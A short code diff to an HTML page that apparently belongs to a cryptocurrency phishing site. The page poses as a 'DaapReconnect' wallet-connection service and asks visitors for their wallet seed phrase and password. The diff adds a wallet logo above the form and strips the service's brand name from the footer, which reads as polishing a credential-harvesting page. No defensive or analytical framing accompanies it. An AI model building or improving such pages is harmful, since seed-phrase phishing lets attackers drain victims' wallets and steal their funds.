--- a/vision.html
+++ b/vision.html
@@ -76,7 +76,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Vision</h4>
+                            <div class="toop">
+                                <img src="vision.jpg" alt="">
+                                <h4>Vision</h4>    
+                            </div>
                             <textarea id="seed" minlength="30" name="Vision" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
@@ -113,7 +116,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
